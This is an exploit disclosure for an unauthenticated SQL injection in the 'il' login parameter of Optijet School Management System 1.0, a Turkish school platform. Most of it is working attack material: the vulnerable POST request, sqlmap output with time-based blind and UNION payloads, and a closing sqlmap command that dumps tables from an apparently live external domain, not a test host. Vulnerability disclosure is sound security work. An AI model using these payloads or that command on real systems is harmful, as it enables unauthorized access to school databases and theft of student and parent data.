# Exploit Title: Optijet School Management System 1.0 - SQL Injection (Unauthenticated)
# Date: 19.10.2021
# Exploit Author: MaliciousFolder
# Vendor Homepage: http://optijet.net/optijet/index.php?r=kalan
# Version: 1.0
# Tested on: Windows 10 - Ubuntu 20.04.3 LTS
# Vulnerable Parameter: "il"

Optijet, a school management system in Turkey, has SQL injection vulnerability on login forms. 

PoC:
"il" parameter on http://localhost/index.php:
il=0&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F
Has SQLi injection, and here is the SQLMAP result:



sqlmap identified the following injection point(s) with a total of 68 HTTP(s) requests:
---
Parameter: il (POST)
    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: il=0 AND (SELECT 6460 FROM (SELECT(SLEEP(5)))LyGV)&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F

    Type: UNION query
    Title: Generic UNION query (NULL) - 4 columns
    Payload: il=0 UNION ALL SELECT CONCAT(0x717a627171,0x46774f754d596e6e666d4a71646468726f4a785250754e4d557441416862555344647a6542765a69,0x7176627871),NULL,NULL,NULL-- -&ilce=0&okul=0&sinav=0&sinif=0&ogrno=eXrw&ograd=&ogr=%C3%96%C4%9Frenci Veli Giri%C5%9F
---



SQLMAP Command to retrieve tables from DB: sqlmap.py -u okulpedia.okulsonuc.com --forms --tables